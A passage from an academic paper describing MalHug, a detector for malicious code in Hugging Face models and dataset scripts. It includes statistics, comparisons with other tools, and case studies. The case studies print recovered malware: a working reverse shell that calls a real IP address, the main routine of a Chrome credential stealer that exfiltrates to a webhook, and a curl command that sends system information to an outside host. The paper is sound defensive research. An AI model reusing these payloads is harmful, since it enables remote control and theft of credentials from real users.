Vulnerable Model Format Statistics. Our investigation covers 705,991 mirrored model repositories, of which 133,058 are empty (containing only .gitattributes and README.md). Among non-empty repositories, we observe a diverse range of model formats, as illustrated in Figure 3, with a significant portion potentially vulnerable to security risks. PyTorch models (.pt/.pth/.bin), which fundamentally use Pickle for serialization, are most prevalent with 335,893 (51.0%) instances. This, combined with explicit Pickle variants (.pkl, .pickle, .joblib, .dill) accounting for 26,696 (4.1%) models, means that over 55% of the models use Pickle-based serialization, raising substantial security concerns. Additional vulnerable formats include Keras models (.keras/.h5/.pb), with 17,739 (2.7%) instances, and TensorFlow models (.pb/.tflite/.ckpt), accounting for 16,395 (2.49%) of the total. Newer formats like .onnx (12,277, 1.8%) and .gguf (18,813, 2.8%) show significant adoption, while NumPy formats (.npz/.npy) represent 4,095 (0.6%) of the models. This distribution highlights the critical need for comprehensive security measures across various serialization methods, particularly given the widespread use of potentially vulnerable formats like Pickle-based serialization in PyTorch models. Note that each model repository may contain multiple model formats, explaining why the total number of models exceeds the number of repositories.

Unsafe API Filtering. Our analysis revealed the distribution of suspicious APIs across models and dataset loading scripts, as shown in Table 5. These unsafe APIs serve as crucial indicators, suggesting potential malicious behaviors in models or dataset loading scripts. Within the models, the Pickle format exhibited the highest concentration of unsafe calls, particularly to __builtin__ methods. While most models demonstrated caution against high-risk operations like the exec or os.system functions, the getattr function was overwhelmingly used despite the Hugging Face platform's clear "unsafe" label. It accounted for 76% of dangerous API usage (3,960 instances in models and 679 in dataset loading scripts), indicating that developers often prioritized programming convenience over security considerations. In dataset loading scripts, we identified multiple categories of unsafe APIs, including eval and execution functions, command execution APIs, network-related functions, and cryptographic operations. The presence of these APIs, though sometimes infrequent, pointed to high specificity and potential security risks. Importantly, the identification of these unsafe APIs is not conclusive evidence of malicious intent, but rather a starting point for further investigation. To thoroughly assess the actual threat posed by these suspicious API calls, we conducted in-depth taint analysis on the flagged instances. This detailed examination allowed us to analyze the malicious behavior patterns, if any, and to distinguish between genuine security threats, necessary research-related usage (such as in security proof-of-concept experiments), and potential false positives.

Table 5: Partial results of main unsafe Libs/APIs filtering.

    Models
      Format/Type   API                         #Cnt
      Pickle        __builtin__.exec              27
                    __builtin__.compile            1
                    __builtin__.eval              23
                    __builtin__.getattr        3,775
                    runpy._run_code                6
                    os.system/posix.system        18
                    webbrowser.open                3
      Keras         Lambda                        72
      TensorFlow    ReadFile/WriteFile/etc.       35

    Dataset Loading Scripts
      YAML                 yaml.load                    1
      Eval and Execution   __builtin__.compile         56
                           __builtin__.eval            74
                           __builtin__.getattr        456
                           __builtin__.__import__       3
                           __builtin__.exec             2
      Command Execution    os.system                   12
                           subprocess.*                13
      Network              urllib.request.*            32
                           urllib.parse.*              15
                           aiohttp.client.get           1
      Cryptography         base64.b64encode             5
                           base64.urlsafe_b64encode     1
                           base64.b64decode             8

    Total                                           4,639

Figure 4: Monthly Malicious Behaviors by Type. (Monthly counts from 2022-03 to 2024-06, broken down into remote control, sensitive information theft, proof-of-concept, potential code injection, and potential object hijack.)

Malicious Behaviors Identified. So far, based on three months of continuous detection on the Ant Group mirrored Hugging Face instance, MalHug has identified 264 malicious models and 9 malicious dataset loading scripts. The publication dates of these malicious artifacts range from March 2022 to June 2024. Figure 4 presents a classification of malicious behaviors based on code snippets extracted from these identified malicious artifacts, categorized through static analysis techniques and meticulous manual reviews by experienced researchers. The classification prominently includes remote control, sensitive information theft, proof-of-concept, potential code injection, and potential object hijack. For potential object hijacking, we employ AST traversal to examine the objects and properties accessed by the getattr function. Instances where the object is a variable or the property relates to code injection are flagged as potential risks. The use of the Lambda layer, due to its difficulty in marshal deserialization and relatively infrequent use, is directly marked as a potential code injection. In distinguishing between proof-of-concept and actual malicious behaviors, we rely on detailed manual reviews. This process reveals that some code initially flagged as malicious is, in fact, proof-of-concept experimentation by researchers, posing no direct harm.

Figure 5: Distribution of malicious behaviors. (a) Quarterly Distribution. (b) Types Distribution.

Our analysis reveals a fluctuating but generally increasing trend in malicious behaviors over the observed period. As shown in Figure 5a, the proportion of detected malicious artifacts varies across quarters. We observe a significant increase in the latter half of the study period, with Q1 2024 and Q2 2024 showing the highest percentages of malicious artifacts. This trend suggests an escalating sophistication or frequency of malicious activities in recent months. Regarding the distribution of malicious behavior types, Figure 5b illustrates that potential object hijack constitutes the largest category, accounting for 42.86% of all identified malicious behaviors. This is followed by potential code injection (26.01%), proof-of-concept (25.27%), remote control (5.13%), and sensitive information theft (0.73%).
The prevalence of proof-of-concept artifacts indicates active security research within the community, while the significant proportion of potential code injection and remote control highlights the pressing need for enhanced security measures.

5.3 Comparison with SOTA Techniques

To contextualize the capabilities of MalHug, we conduct a qualitative comparison (see Table 6) with other SOTA techniques in PTM code poisoning detection. Existing tools like Pickle Scanning [16], PickleScan [46], and Fickling [52] primarily focus on detecting unsafe libraries and API calls in pickle files. Bhakti [10] and ModelScan [63] extend to unsafe Lambda layer detection for TensorFlow and Keras models, but still concentrate on library- and API-level analysis and fail to analyze dataset loading scripts. In contrast, MalHug offers several distinctive features that set it apart from existing solutions. Unlike other tools that focus solely on unsafe libraries and API calls, MalHug performs analysis at the semantic level, allowing for a more nuanced and comprehensive detection of potential security threats. Moreover, MalHug is the only tool in our comparison that extends its analysis to dataset loading scripts, addressing a critical gap in the current security landscape of model hub ecosystems. Similar to ModelScan, MalHug supports various pickle variants as well as TensorFlow and Keras formats, enabling comprehensive security analysis across different model types.

Table 6: Qualitative comparison with other SOTA techniques.

    Tool                  Developer      Granularity       Dataset Support?  Model Format Support?
    Pickle Scanning [16]  HuggingFace    Unsafe Lib & API  ✗                 Pickle Only
    PickleScan [46]       mmaitre314     Unsafe Lib & API  ✗                 Pickle Only
    Fickling [52]         Trail of Bits  Unsafe Lib & API  ✗                 Pickle Only
    Bhakti [10]           Dropbox Inc    Unsafe Lib & API  ✗                 Tensorflow & Keras
    ModelScan [63]        ProtectAI      Unsafe Lib & API  ✗                 Pickle Variants; Tensorflow & Keras
    MalHug                /              Semantic Level    ✓                 Pickle Variants; Tensorflow & Keras

5.4 Case Studies

Case#1: Remote Control. As shown in Figure 6, malicious code exists in a PyTorch model repository named "baller10", which establishes a reverse shell when the model is loaded, executing commands based on the operating system (Windows or UNIX-like). The malicious payload resembles those found in the previously identified "baller423/goober2" repository by JFrog [9], revealing a pattern of malicious code reuse and adaptation. Despite the subsequent deletion of the "baller423" account, the similarity in model name ("baller10") suggests a possible connection. Notably, for the 10 malicious models created by "star23", our analysis unveils a broader attack strategy: these models' reverse shell commands point to different geographical locations, including Sri Lanka, Germany, and Poland, indicating that the attackers might use proxy servers to hide their real location. Despite being labeled "for research use" with warnings against downloading, these models successfully connect to external servers, posing significant security risks. This case highlights the real-world consequences of such attacks on unsuspecting users and emphasizes the importance of robust security protocols in PTM reuse workflows.

    RHOST="192.248.1.167";RPORT=4242;
    from sys import platform
    if platform != 'win32':
        import threading
        def a():
            import socket, pty, os
            RHOST="192.248.1.167";RPORT=4242
            s=socket.socket();
            s.connect((RHOST,RPORT));
            [os.dup2(s.fileno(),fd) for fd in (0,1,2)];
            pty.spawn("/bin/sh")
        threading.Thread(target=a).start()
    else:
        import os, socket, subprocess, threading, sys
        def s2p(s, p):
            while True: p.stdin.write(s.recv(1024).decode()); p.stdin.flush()
        def p2s(s, p):
            while True: s.send(p.stdout.read(1).encode())
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        while True:
            try: s.connect(("192.248.1.167", 4242)); break
            except: pass
        p=subprocess.Popen(["powershell.exe"], stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell=True, text=True)
        threading.Thread(target=s2p, args=[s,p], daemon=True).start()
        threading.Thread(target=p2s, args=[s,p], daemon=True).start()
        p.wait()

Figure 6: Code snippet injected into "star23/baller10", which establishes a reverse shell, enabling remote control.

Case#2: Chrome Credential Stealer. This case examines a sophisticated malware sample discovered in the "Besthpz/best" repository, designed to steal credentials from Google Chrome browsers. The malware's main function (see Figure 7) executes a series of operations to extract and exfiltrate sensitive user data. Initially, it calls Functions.Initialize (Line 2) to prepare the environment, terminating any running Chrome processes and setting up necessary directories. The malware then proceeds to steal passwords and cookies using StealerFunctions.stealPass (Line 3) and StealerFunctions.stealCookies (Line 4), respectively. These functions decrypt and extract login credentials and cookie data from Chrome's local storage. The stolen information is then sent to a remote server using StealerFunctions.sendToWebhook (Line 5), potentially compromising user privacy and security. Finally, the malware creates a password-protected ZIP file containing the stolen data (Line 6), further obfuscating its activities.

    1  def main():
    2      Functions.Initialize()
    3      passwordData = StealerFunctions.stealPass()
    4      cookieData = StealerFunctions.stealCookies()
    5      StealerFunctions.sendToWebhook(f"Password Data:\n{passwordData}\n\nCookie Data:\n{cookieData}")
    6      zip_file(Paths.stealerLog, os.path.join(Paths.stealerLog, 'LOG.zip'), 'henanigans')

Figure 7: Dataset loading script in "Besthpz/best", which steals Chrome credentials and sends them to a remote server.
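Exfiltration flows like the one in Figure 7 are exactly what the source-sink configuration of Section 4.3 is designed to surface. The following self-contained sketch illustrates the idea on a toy snippet; the source and sink lists and the sample code are illustrative stand-ins, not MalHug's actual configuration:

```python
import ast

# Toy source/sink taint check in the spirit of Section 4.3; lists and
# sample below are illustrative only.
SOURCES = {"os.environ.get", "os.getlogin"}
SINKS = {"requests.get", "requests.post", "socket.connect"}

sample = """
import os, requests
user = os.getlogin()
requests.post("http://attacker.example/collect", data=user)
"""

def dotted(node):
    # Render a call target such as requests.post as a dotted string
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = dotted(node.value)
        return f"{base}.{node.attr}" if base else None
    return None

tainted, flows = set(), []
for node in ast.walk(ast.parse(sample)):
    # Mark variables assigned from a source call as tainted
    if isinstance(node, ast.Assign) and isinstance(node.value, ast.Call):
        if dotted(node.value.func) in SOURCES:
            tainted |= {t.id for t in node.targets if isinstance(t, ast.Name)}
    # Report sink calls whose argument subtree mentions a tainted name
    if isinstance(node, ast.Call) and dotted(node.func) in SINKS:
        names = {n.id for n in ast.walk(node) if isinstance(n, ast.Name)}
        if tainted & names:
            flows.append(dotted(node.func))
print(flows)  # ['requests.post']
```

Real payloads spread such flows across helper functions and modules, which is why MalHug builds on Scalpel's control-flow and data-flow graphs rather than a single-pass AST walk like this one.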
Conference’17, July 2017, Washington, DC, USA Zhao et al.

    import datasets
    import subprocess

    ...
    class StanSmall(datasets.GeneratorBasedBuilder):

        def __init__(self, **kwargs):
            subprocess.check_output(
                '(uname -a; ps auxww) | curl -s https://eoxvp5idbpacu69.m.pipedream.net/$(whoami) --data-binary @-',
                stderr=subprocess.STDOUT,
                shell=True)
            super(StanSmall, self).__init__(**kwargs)
    ...

Figure 8: Dataset loading script in "Yash2998db/stan_small", which leaks sensitive system information.

Case#3: Operating System Reconnaissance. This case study examines a potentially malicious loading script discovered in the "Yash2998db/stan_small" dataset repository. The script, designed as a custom dataset builder for the Hugging Face datasets library, contains suspicious code within its initialization method. Specifically, in the __init__ method of the StanSmall class, the script executes a subprocess that collects and exfiltrates sensitive system information. The malicious code uses subprocess.check_output to run shell commands that gather system details (uname -a) and information about running processes (ps auxww). The collected data is then sent to a remote server (eoxvp5idbpacu69.m.pipedream.net) via a curl command, with the current user's identity appended to the URL ($(whoami)).

6 DISCUSSION

Mitigation. Mitigating code poisoning attacks on model hubs requires a comprehensive approach combining platform-level security and developer vigilance. While Hugging Face has implemented pickle import scanning, this measure alone is insufficient due to its inability to perform deep semantic analysis of potentially malicious code. As for malicious dataset loading scripts, Hugging Face plans to disable the automatic execution of dataset loading scripts by default in its next major release, requiring users to explicitly set "trust_remote_code=True" for script-dependent datasets [24]. Additionally, Keras has addressed vulnerabilities related to Lambda layers in version 2.13 [6], enhancing the security of models using this feature. Despite these improvements, developers must remain vigilant, adopting safer practices such as using secure model formats and treating unknown pre-trained models with caution, adhering to the principle that "Models Are Codes".

Generalizability and Scalability. While our study primarily focuses on the Hugging Face platform, the insights gained and methodologies developed are broadly applicable to other model hubs. The identified code poisoning attack vectors and proposed mitigation strategies are relevant across various platforms and frameworks. Our approach demonstrates the potential for large-scale analysis of models and datasets.

Limitations. While our study provides valuable insights into code poisoning attacks on model hubs, several limitations warrant consideration. Firstly, due to access permission restrictions, our analysis could not encompass all models and datasets on the platform, potentially leaving some malicious instances undetected. Secondly, the collection of unsafe libraries and APIs, though informed by existing work like Pysa [17], may not exhaustively cover all potential malicious exploits in the wild. Thirdly, although we have not encountered examples of obfuscation techniques used to evade static analysis in models, the possibility of such anti-analysis methods cannot be dismissed, drawing parallels from research on package manager poisoning [11, 38]. Finally, we identify potentially malicious TensorFlow and Keras models by flagging those using lambda functions and unsafe operators, which may result in false positives. These limitations underscore the need for continuous refinement of detection methodologies and highlight the challenges in securing pre-trained model hubs against evolving threats.

7 RELATED WORK

Malicious Code Poisoning Attacks. Code poisoning attacks have been a persistent threat in software supply chains. Recent studies have explored these attacks in various contexts, including package managers [11, 23, 36, 54] and pre-trained model pipelines [22, 39, 84]. Ladisa et al. [36] proposed a comprehensive taxonomy of attacks on open-source supply chains, covering 107 unique vectors linked to 94 real-world incidents. In the PTM domain, Hua et al. [22] demonstrated how malicious payloads could be hidden in mobile deep learning models using black-box backdoor attacks. Building upon these studies, our work extends the current understanding by conducting the first systematic investigation of malicious code poisoning attacks specifically targeting pre-trained model hubs.

Security of Model Hubs. As model hubs have gained prominence, their security has become a growing concern. Zhou [85] examined insecure deserialization in pre-trained large model hubs, revealing risks in unsafe pickle.loads operations. Walker and Wood [81] analyzed machine learning supply chain attacks, highlighting the danger of maliciously crafted model files. Jiang et al. [31] studied artifacts and security features across multiple model hubs, exposing insufficient defenses for pre-trained models (PTMs). In a separate study, Jiang et al. [29] investigated PTM naming practices on Hugging Face, introducing DARA for detecting naming anomalies. Our work extends beyond these studies by providing the first systematic investigation of malicious code injection attacks specifically targeting pre-trained model hubs. We not only analyze vulnerabilities and attack vectors but also implement a detection pipeline deployed in a real-world industrial setting.

8 CONCLUSION

This paper presents the first systematic study of malicious code poisoning attacks on pre-trained model hubs, focusing on Hugging Face. We developed MalHug, an end-to-end pipeline that addresses the limitations of existing tools through comprehensive analysis techniques. The deployment within Ant Group demonstrated its effectiveness in real-world industrial settings, uncovering 264 malicious models and 9 malicious dataset loading scripts among over 705K models and 176K datasets. These findings reveal significant security threats, including reverse shell attacks, credential theft, and system reconnaissance. Our work advances our understanding of vulnerabilities in the PTM supply chain and provides a practical solution for enhancing model hub security.
REFERENCES
[1] Alien and Nicky. 2023. Beware of Hugging Face open-source component risks exploited in large language model supply chain attacks. https://security.tencent.com/index.php/blog/msg/209. Accessed: 2024-07-05.
[2] Amr Elmeleegy, Shivam Raj, Brian Slechta, and Vishal Mehta. 2024. Demystifying AI Inference Deployments for Trillion Parameter Large Language Models. https://developer.nvidia.com/blog/demystifying-ai-inference-deployments-for-trillion-parameter-large-language-models/. Accessed: 2024-07-05.
[3] Bar Lanyado. 2023. More than 1500 HuggingFace API Tokens were exposed, leaving millions of Meta-Llama, Bloom, and Pythia users vulnerable. https://www.lasso.security/blog/1500-huggingface-api-tokens-were-exposed-leaving-millions-of-meta-llama-bloom-and-pythia-users-for-supply-chain-attacks. Accessed: 2024-07-05.
[4] Boyan Milanov. 2024. Exploiting ML models with pickle file attacks: Part 2. https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-2/. Accessed: 2024-07-05.
[5] Boyan Milanov. 2024. Exploiting ML models with pickle file attacks: Part 1. https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-1/. Accessed: 2024-07-05.
[6] CERT Vulnerability Notes Database. 2024. Keras 2 Lambda layers allow arbitrary code injection in TensorFlow models. https://kb.cert.org/vuls/id/253266. Accessed: 2024-07-13.
[7] Cisco-Talos. 2024. ClamAV. https://github.com/Cisco-Talos/clamav. Accessed: 2024-07-05.
[8] Cloudpickle Developers. 2024. Cloudpickle: Extended pickling support for Python objects. https://github.com/cloudpipe/cloudpickle. Accessed: 2024-07-07.
[9] David Cohen. 2024. Data scientists targeted by malicious Hugging Face ML models with silent backdoor. https://jfrog.com/blog/data-scientists-targeted-by-malicious-hugging-face-ml-models-with-silent-backdoor/. Accessed: 2024-07-05.
[10] Dropbox. 2024. Bhakti. https://github.com/dropbox/bhakti. Accessed: 2024-07-12.
[11] Ruian Duan, Omar Alrawi, Ranjita Pai Kasturi, Ryan Elder, Brendan Saltaformaggio, and Wenke Lee. 2021. Towards Measuring Supply Chain Attacks on Package Managers for Interpreted Languages. In 28th Annual Network and Distributed System Security Symposium, NDSS. https://www.ndss-symposium.org/wp-content/uploads/ndss2021_1B-1_23055_paper.pdf
[12] Eoin Wickens and Kasimir Schulz. 2024. Hijacking safeTensors conversion on Hugging Face. https://hiddenlayer.com/research/silent-sabotage/. Accessed: 2024-07-05.
[13] Eoin Wickens, Marta Janus, and Tom Bonner. 2022. Pickle files: The new ML model attack vector. https://hiddenlayer.com/research/pickle-strike/. Accessed: 2024-07-05.
[14] Eoin Wickens, Marta Janus, and Tom Bonner. 2022. Weaponizing ML models with ransomware. https://hiddenlayer.com/research/weaponizing-machine-learning-models-with-ransomware/. Accessed: 2024-07-05.
[15] Hugging Face. 2024. Load a dataset from the hub. https://huggingface.co/docs/datasets/load_hub. Accessed: 2024-07-07.
[16] Hugging Face. 2024. Pickle scanning. https://huggingface.co/docs/hub/security-pickle. Accessed: 2024-07-05.
[17] Facebook. 2024. Pysa Taint Rules. https://github.com/facebook/pyre-check/tree/main/stubs/taint/core_privacy_security. Accessed: 2024-07-13.
[18] William Fedus, Barret Zoph, and Noam Shazeer. 2022. Switch Transformers: Scaling to Trillion Parameter Models with Simple and Efficient Sparsity. Journal of Machine Learning Research 23, 120 (2022), 1–39. http://jmlr.org/papers/v23/21-0998.html
[19] GGML Developers. 2024. GGUF: GPT-Generated Unified Format. https://github.com/ggerganov/ggml/blob/master/docs/gguf.md. Accessed: 2024-07-07.
[20] Wenbo Guo, Zhengzi Xu, Chengwei Liu, Cheng Huang, Yong Fang, and Yang Liu. 2023. An Empirical Study of Malicious Code In PyPI Ecosystem. In 2023 38th IEEE/ACM International Conference on Automated Software Engineering (ASE). IEEE, 166–177.
[21] H5PY. 2024. File objects. https://docs.h5py.org/en/stable/high/file.html. Accessed: 2024-07-11.
[22] Jiayi Hua, Kailong Wang, Meizhen Wang, Guangdong Bai, Xiapu Luo, and Haoyu Wang. 2024. MalModel: Hiding Malicious Payload in Mobile Deep Learning Models with Black-box Backdoor Attack. arXiv preprint arXiv:2401.02659 (2024).
[23] Cheng Huang, Nannan Wang, Ziyan Wang, Siqi Sun, Lingzi Li, Junren Chen, Qianchong Zhao, Jiaxuan Han, Zhen Yang, and Lei Shi. 2024. DONAPI: Malicious NPM Packages Detector using Behavior Sequence Knowledge Mapping. arXiv preprint arXiv:2403.08334 (2024).
[24] Hugging Face. 2024. Dataset loading scripts. https://huggingface.co/docs/datasets/dataset_script. Accessed: 2024-07-10.
[25] Hugging Face. 2024. Hugging Face Hub API. https://huggingface.co/docs/huggingface_hub/v0.5.1/en/package_reference/hf_api. Accessed: 2024-07-12.
[26] Hugging Face. 2024. Hugging Face Models. https://huggingface.co/models. Accessed: 2024-07-06.
[27] Hugging Face. 2024. Hugging Face: The AI community building the future. https://huggingface.co/. Accessed: 2024-07-12.
[28] Hugging Face. 2024. safetensors. https://huggingface.co/docs/safetensors/index. Accessed: 2024-07-07.
[29] Wenxin Jiang, Chingwo Cheung, George K Thiruvathukal, and James C Davis. 2023. Exploring naming conventions (and defects) of pre-trained deep learning models in hugging face and other model hubs. arXiv preprint arXiv:2310.01642 (2023).
[30] Wenxin Jiang, Nicholas Synovic, Matt Hyatt, Taylor R. Schorlemmer, Rohan Sethi, Yung-Hsiang Lu, George K. Thiruvathukal, and James C. Davis. 2023. An Empirical Study of Pre-Trained Model Reuse in the Hugging Face Deep Learning Model Registry. In Proceedings of the 45th International Conference on Software Engineering (Melbourne, Victoria, Australia) (ICSE '23). IEEE Press, 2463–2475. https://doi.org/10.1109/ICSE48619.2023.00206
[31] Wenxin Jiang, Nicholas Synovic, Rohan Sethi, Aryan Indarapu, Matt Hyatt, Taylor R. Schorlemmer, George K. Thiruvathukal, and James C. Davis. 2022. An Empirical Study of Artifacts and Security Risks in the Pre-trained Model Supply Chain. In Proceedings of the 2022 ACM Workshop on Software Supply Chain Offensive Research and Ecosystem Defenses (Los Angeles, CA, USA) (SCORED'22). Association for Computing Machinery, New York, NY, USA, 105–114. https://doi.org/10.1145/3560835.3564547
[32] Wenxin Jiang, Jerin Yasmin, Jason Jones, Nicholas Synovic, Jiashen Kuo, Nathaniel Bielanski, Yuan Tian, George K. Thiruvathukal, and James C. Davis. 2024. PeaTMOSS: A Dataset and Initial Analysis of Pre-Trained Models in Open-Source Software. In Proceedings of the 21st International Conference on Mining Software Repositories (Lisbon, Portugal) (MSR '24). Association for Computing Machinery, New York, NY, USA, 431–443. https://doi.org/10.1145/3643991.3644907
[33] Joblib. 2024. Joblib: running Python functions as pipeline jobs. https://joblib.readthedocs.io/en/stable/generated/joblib.load.html. Accessed: 2024-07-07.
[34] John Snow Labs. 2024. Spark NLP Models Hub. https://nlp.johnsnowlabs.com/models. Accessed: 2024-07-06.
[35] Kaggle. 2024. Kaggle Models. https://www.kaggle.com/models. Accessed: 2024-07-06.
[36] P. Ladisa, H. Plate, M. Martinez, and O. Barais. 2023. SoK: Taxonomy of Attacks on Open-Source Software Supply Chains. In 2023 IEEE Symposium on Security and Privacy (SP). IEEE Computer Society, Los Alamitos, CA, USA, 1509–1526. https://doi.org/10.1109/SP46215.2023.10179304
[37] Li Li, Jiawei Wang, and Haowei Quan. 2022. Scalpel: The Python Static Analysis Framework. arXiv preprint arXiv:2202.11840 (2022).
[38] Ningke Li, Shenao Wang, Mingxi Feng, Kailong Wang, Meizhen Wang, and Haoyu Wang. 2023. MalWuKong: Towards Fast, Accurate, and Multilingual Detection of Malicious Code Poisoning in OSS Supply Chains. In 2023 38th IEEE/ACM International Conference on Automated Software Engineering (ASE). 1993–2005. https://doi.org/10.1109/ASE56229.2023.00073
[39] Yuanchun Li, Jiayi Hua, Haoyu Wang, Chunyang Chen, and Yunxin Liu. 2021. DeepPayload: Black-box backdoor attack on deep learning models through neural payload injection. In 2021 IEEE/ACM 43rd International Conference on Software Engineering (ICSE). IEEE, 263–274.
[40] Xiangru Lian, Binhang Yuan, Xuefeng Zhu, Yulong Wang, Yongjun He, Honghuan Wu, Lei Sun, Haodong Lyu, Chengjun Liu, Xing Dong, Yiqiao Liao, Mingnan Luo, Congfei Zhang, Jingru Xie, Haonan Li, Lei Chen, Renjie Huang, Jianying Lin, Chengchun Shu, Xuezhong Qiu, Zhishan Liu, Dongying Kong, Lei Yuan, Hai Yu, Sen Yang, Ce Zhang, and Ji Liu. 2022. Persia: An Open, Hybrid System Scaling Deep Learning-based Recommenders up to 100 Trillion Parameters. In Proceedings of the 28th ACM SIGKDD Conference on Knowledge Discovery and Data Mining (Washington DC, USA) (KDD '22). Association for Computing Machinery, New York, NY, USA, 3288–3298. https://doi.org/10.1145/3534678.3539070
[41] Liandanxia. 2024. Liandanxia Model Hubs. https://liandanxia.com/models. Accessed: 2024-07-06.
[42] Michael M McKerns, Leif Strand, Tim Sullivan, Alta Fang, and Michael AG Aivazis. 2012. Building a framework for predictive science. arXiv preprint arXiv:1202.1056 (2012).
[43] MessagePack Developers. 2024. MessagePack specification. https://github.com/msgpack/msgpack/blob/master/spec.md. Accessed: 2024-07-07.
[44] ModelScope. 2024. ModelScope Models. https://modelscope.cn/models. Accessed: 2024-07-06.
[45] MindSpore. 2024. MindSpore Model Hubs. https://xihe.mindspore.cn/models. Accessed: 2024-07-06.
[46] mmaitre314. 2024. Picklescan. https://github.com/mmaitre314/picklescan. Accessed: 2024-07-12.
[47] ModelZoo. 2024. ModelZoo. https://modelzoo.co/. Accessed: 2024-07-06.
[48] Nadav Noy. 2024. Legit discovers "AI Jacking" vulnerability in popular Hugging Face AI platform. https://www.legitsecurity.com/blog/tens-of-thousands-of-developers-were-potentially-impacted-by-the-hugging-face-aijacking-attack. Accessed: 2024-07-05.
[49] NumPy Developers. 2024. numpy.save. https://numpy.org/doc/stable/reference/generated/numpy.save.html#numpy.save. Accessed: 2024-07-07.
[50] NumPy Developers. 2024. numpy.savez. https://numpy.org/doc/stable/reference/generated/numpy.savez.html. Accessed: 2024-07-07.
[51] NVIDIA. 2024. NVIDIA NGC Models. https://catalog.ngc.nvidia.com/models. Accessed: 2024-07-06.
[52] Trail of Bits. 2021. Fickling. https://github.com/trailofbits/fickling. Accessed: 2024-07-05.
[53] Trail of Bits. 2024. List of ML file formats. https://github.com/trailofbits/ml-file-formats. Accessed: 2024-07-07.
[54] Marc Ohm, Henrik Plate, Arnold Sykosch, and Michael Meier. 2020. Backstabber's Knife Collection: A Review of Open Source Software Supply Chain Attacks. In Detection of Intrusions and Malware, and Vulnerability Assessment, Clémentine Maurice, Leyla Bilge, Gianluca Stringhini, and Nuno Neves (Eds.). Springer International Publishing, Cham, 23–43.
[55] ONNX. 2024. ONNX Model Zoo. https://onnx.ai/models/. Accessed: 2024-07-06.
[56] ONNX Developers. 2024. ONNX: Serialization with protobuf. https://onnx.ai/onnx/intro/concepts.html#serialization-with-protobuf. Accessed: 2024-07-07.
[57] OpenAI. 2024. ChatGPT. https://chat.openai.com. Accessed: 2024-07-05.
[58] OpenCSG. 2024. OpenCSG Models. https://opencsg.com/models. Accessed: 2024-07-06.
[59] OpenMMLab. 2024. OpenMMLab ModelZoo. https://platform.openmmlab.com/modelzoo/. Accessed: 2024-07-06.
[60] OWASP. 2024. OWASP Top 10 for Large Language Model Applications. https://owasp.org/www-project-top-10-for-large-language-model-applications/. Accessed: 2024-07-05.
[61] PaddlePaddle. 2024. PaddlePaddle Model Hubs. https://aistudio.baidu.com/modelsoverview. Accessed: 2024-07-06.
[62] ProtectAI. 2023. Model serialization attacks. https://github.com/protectai/modelscan/blob/main/docs/model_serialization_attacks.md. Accessed: 2024-07-07.
[63] ProtectAI. 2023. Modelscan. https://github.com/protectai/modelscan. Accessed: 2024-07-05.
[64] Python. 2024. JSON encoder and decoder. https://docs.python.org/3/library/json.html. Accessed: 2024-07-07.
[65] Python. 2024. marshal: Internal Python object serialization. https://docs.python.org/3/library/marshal.html. Accessed: 2024-07-07.
[66] Python. 2024. Pickle: Python object serialization. https://docs.python.org/3/library/pickle.html. Accessed: 2024-07-05.
[67] Python. 2024. Pickletools: Tools for pickle developers. https://docs.python.org/3/library/pickletools.html. Accessed: 2024-07-11.
[68] PyTorch. 2024. PyTorch. https://github.com/pytorch/pytorch. Accessed: 2024-07-05.
[69] Stack Overflow. 2020. How to list all used operations in TensorFlow SavedModel? https://stackoverflow.com/questions/60154650/how-to-list-all-used-operations-in-tensorflow-savedmodel. Accessed: 2024-07-11.
[70] Evan Sultanik. 2021. Never a Dill Moment: Exploiting Machine Learning Pickle Files. https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/. Accessed: 2024-07-05.
[71] SwanHub. 2024. SwanHub Models. https://swanhub.co/models. Accessed: 2024-07-06.
[72] TensorFlow. 2024. Checkpoint. https://www.tensorflow.org/guide/checkpoint. Accessed: 2024-07-07.
[73] TensorFlow. 2024. HDF5 format. https://www.tensorflow.org/tutorials/keras/save_and_load#hdf5_format. Accessed: 2024-07-07.
[74] TensorFlow. 2024. SavedModel. https://www.tensorflow.org/guide/saved_model. Accessed: 2024-07-07.
[75] TensorFlow. 2024. TensorFlow Lite. https://www.tensorflow.org/lite/guide. Accessed: 2024-07-07.
[76] TensorFlow. 2024. tf.io.read_file. https://www.tensorflow.org/api_docs/python/tf/io/read_file. Accessed: 2024-07-11.
[77] TensorFlow. 2024. tf.io.write_file. https://www.tensorflow.org/api_docs/python/tf/io/write_file. Accessed: 2024-07-11.
[78] TensorFlow. 2024. Using TensorFlow securely. https://github.com/tensorflow/tensorflow/security/policy. Accessed: 2024-07-08.
[79] Tom Bonner. 2023. Models are code: A deep dive into security risks in TensorFlow and Keras. https://hiddenlayer.com/research/models-are-code/. Accessed: 2024-07-05.
[80] VirusTotal. 2024. YARA. https://github.com/virustotal/yara. Accessed: 2024-07-12.
[81] Mary Walker and Adrian Wood. 2024. Confused Learning: Supply Chain Attacks through Machine Learning Models. https://i.blackhat.com/Asia-24/Presentations/Asia-24-Wood-Confused-Learning.pdf. Accessed: 2024-07-11.
[82] Shenao Wang, Yanjie Zhao, Xinyi Hou, and Haoyu Wang. 2024. Large language model supply chain: A research agenda. arXiv preprint arXiv:2404.12736 (2024).
[83] WiseModel. 2024. WiseModel. https://www.wisemodel.cn/models. Accessed: 2024-07-06.
[84] X. Zhang, Z. Zhang, S. Ji, and T. Wang. 2021. Trojaning Language Models for Fun and Profit. In 2021 IEEE European Symposium on Security and Privacy (EuroS&P). IEEE Computer Society, Los Alamitos, CA, USA, 179–197. https://doi.org/10.1109/EuroSP51992.2021.00022
[85] Peng Zhou. 2024. How to Make Hugging Face to Hug Worms: Discovering and Exploiting Unsafe Pickle.loads over Pre-Trained Large Model Hubs. https://www.blackhat.com/asia-24/briefings/schedule/index.html#how-to-make-hugging-face-to-hug-worms-discovering-and-exploiting-unsafe-pickleloads-over-pre-trained-large-model-hubs-36261. Accessed: 2024-07-05.
